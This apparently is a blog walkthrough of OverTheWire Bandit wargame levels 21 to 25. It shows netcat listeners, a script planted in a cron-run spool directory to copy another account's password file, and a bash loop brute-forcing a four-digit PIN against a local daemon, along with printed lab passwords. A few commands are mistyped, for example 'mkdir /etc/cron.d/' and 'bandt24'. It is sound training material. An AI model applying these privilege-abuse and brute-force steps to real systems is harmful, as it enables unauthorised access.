Home - Writeups - Bandit Overthewire wargames walkthrough level 21 – 25

Bandit Overthewire wargames walkthrough level 21 – 25

Bandit is a game for beginners in Linux and Bash. As it is a great guide for learning the command line and Linux. So we will continue with the game here is the link for the next level.

Bandit overthewire wargames level 16 – 20

Bandit overthewire wargames level 26 – 30

Level 21→25

  • Host: bandit.labs.overthewire.org
  • port: 2220

bandit level 20 → 21

As we are instructed password for the next level is retrieved by the following steps. Firstly there is a binary in the home directory and it will connect to a port we specify. Secondly, after connecting to the port it will read a line and it should match with password of the bandit20 level. After that, it will return the password of the bandit21 level if the password of bandit20 is correct. In conclusion, we will use the echo command to echo the password of bandit20 with ‘nc’ command with -l flag for listening mode. In the end, we will use ‘&’ sign to put this running process in the background. Then we will execute the binary with the specified port to get the password.

bandit level 21, nc, localhost
  • echo GbKksEFF4yrVs6il55v6gwY5aVje5f0j | nc -l localhost -p 2000 &
  • ./suconnect 2000

bandit level 21 → 22

In this level are told to look for cronjobs in directory /etc/cron.d/. Cron jobs are scheduler jobs Linux they run automatically after a time interval. In /etc/cron.d/ the directory we have a cronjob of bandit22. As we explore it because we are looking for a password of bandit22. We use cat command and see a bash script located at /usr/bin/cronjob_bandit22.sh. After that, we will again use the cat command to see the contents of the bash script. Script has three lines. The first line is called the shebang line which in the environment variable which will run it. The second line is changing the permission of a file to 644 which makes it readable to everybody. The third line is getting the password of bandit22 and putting it in the file using a stdout operator. In conclusion the password of bandit22 is saved in that file.

cron jobs, level 22, bash
  • cd /etc/cron.d/
  • ls
  • less cronjob_bandit22
  • cat /usr/bin/cronjob_bandit22.sh
  • cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit level 22 → 23

As we are instructed we have to see in /etc/cron.d/ directory to see what is executed. So we go to directory /etc/cron.d/ and see the contents using ls command. As we look through the content we explore cronjob_bandit23 file because we are looking for a password of bandit23. As we see cronjob_bandit23 is running a bash script located at /usr/bin/cronjob_bandit23.sh.

bandit level 23, bash, cut, whoami

After that, we use the cat command to read the file. Its a bash script and it saving password of bandit23 in a file in /tmp directory but we have to decode the filename to get it. As it uses whoami command and put that value in ‘echo i am user $myname’. Therefore we know it is for user bandit23. So the output will I am user bandit23. Now to get the filename we have to simply run my target command but replacing $myname with bandit23. In end, we get the filename and we use the cat command to get the password of the next level.

  • cd /etc/cron.d/
  • ls
  • cat cronjob_bandit23
  • cat /usr/bin/cronjob_bandit23.sh
  • echo I am user bandit23 | md5sum | cut -d ‘ ‘ -f 1
  • cat /tmp/8ca319486bfbbc3663ea0fbe81326349

bandit level 23 → 24

It a cron job task. We will look in /etc/cron.d/ directory. Then we will explore cronjob_bandit24 file as we are looking for password of bandit24. Therefore we see it runs a file ‘/usr/bin/cronjob_bandit24.sh’. Then we will use cat command and see it runs all the scripts in /var/spool/bandit24 directory and deletes then after the execution is done. For this task, we will write a script.

cron jobs, bash
  • cd /etc/cron.d/
  • ls
  • cat /usr/bin/cronjob_bandit24.sh

But first we will create a directory in tmp folder, you can give anyname. Then we will use vim editor (vim is a command line text editor in unix based operating system). Then we will type vim name of script according to our choice here i wrote script.sh.

  • mkdir /etc/cron.d/
  • cd /tmp/cron
  • vim script.sh

We write our script. We write two lines and the first lines consist of a shebang line of the environment where the script will run and in our case script will run with bash. Then in the second line we write a command to copy contents /etc/bandit_pass/bandit24 to /tmp/cron/pass.txt. As this our directory where we will create our file.

password for bandit24
#!/bin/bash
cat /etc/bandit_pass/bandt24 > /tmp/cron/pass.txt

Moreover we will change permissions of file. But firstly we create pass.txt file in cron directory using ‘touch’ command. Secondly we will change permissions of script.sh to make it executable to everybody and change permission of pass.txt to make it readable and writeable to everybody. After that we copy script.sh in /var/spool/bandit24 directory and wait for cronjob to execute it. In the end we get our password in pass.txt and we use cat command to get the password.

password
  • touch pass.txt
  • chmod 777 script.sh
  • chmod 666 pass.txt
  • cp script.sh /var/spool/bandit24
  • cat pass.txt

bandit level 24 → 25

In this level, we will brute force daemon process running on port 30002. This process takes the password of bandit24 and 4 digit pin code but we don’t know the pin code. Therefore we will write a bash script that will brute force and give us a password. Firstly we make a directory in /tmp folder. Secondly, we will create a bash script using the vim command-line editor.

bruteforce bandit level 25
  • mkdir /tmp/bruteforc
  • cd /tmp/bruteforc
  • vim bruteforce.sh
bash
#!/bin/bash

password="UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ"
for i in {0000..9999}
do
  echo $password' '$i >> pass.txt
done

cat pass.txt | nc localhost 30002 >> passwd

After writing bash script we will change its permission so that we can execute it. We will use chmod command to change its permission and then will execute the script. The password is in passwd file but it also has lots of failed attempts. So we will use uniq command to get a uniq string from the file. But for uniq command to run the file most be sorted. So we will use sort command to sort the file then using pipe operator use uniq command.

  • ./bruteforce.sh
  • sort passwd | uniq -u

Command we learned.

Share
4.8 5 votes
Article Rating
Subscribe
Notify of
guest
2 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
trackback
1 year ago

[…] Bandit overthewire wargames level 21 – 25 […]

trackback
1 year ago

[…] Bandit overthewire wargames level 21 – 25 […]

2
0
Would love your thoughts, please comment.x
()
x